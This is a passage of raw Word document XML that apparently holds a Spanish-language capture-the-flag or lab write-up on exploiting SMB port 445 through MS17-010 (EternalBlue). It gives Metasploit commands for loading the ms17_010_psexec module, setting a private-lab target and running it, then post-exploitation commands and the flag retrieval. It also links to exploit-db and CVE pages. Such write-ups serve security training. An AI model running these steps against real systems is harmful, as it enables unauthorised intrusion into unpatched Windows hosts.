          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1422400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1612900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="15"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elegimos el puerto 445 que se puede explotar con </w:t>
      </w:r>
      <w:hyperlink r:id="rId41">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check) | Tenable®</w:t>
        </w:r>
      </w:hyperlink>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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search eternal</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1879600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1"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sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/windows/smb/ms17_010_psexec</w:t>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546100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7"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sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set rHOST 192.168.0.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="533400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2463800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="12"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32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sysinfo</w:t>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914400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Net</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>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731200" cy="2540000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9"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z w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Se localiza el archivo flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3810000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6"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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Miramos el contenido del archivo flag.txt. Está codificado.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153025" cy="2857500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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1530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sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Decodificamos</w:t>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4038600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="17"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731200" cy="4038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98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4.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tenable.com/plugins/nessus/97833" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.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xploit-db.com/exploits/6841" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.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yperlink" Target="https://nvd.nist.gov/vuln/detail/cve-2008-4250" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/6824" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0519" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0520" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2002-1117" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nessus.org/u?8dcab5e4" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nessus.org/u?b9d9ebf9" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nessus.org/u?4c7e0cf3" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nessus.org/u?234f8ef8" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nessus.org/u?59db5b5b" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/stamparm/EternalRocks/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vulners.com/nessus/SMB_NULL_SESSION.NASL" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/42315" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1117" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/6463" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/7104" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nessus.org/u?321523eb" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nessus.org/u?2f80aef2" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nessus.org/u?8dcab5e4" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nessus.org/u?321523eb" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nessus.org/u?68fc8eff" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nessus.org/u?d9f569cf" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nessus.org/u?065561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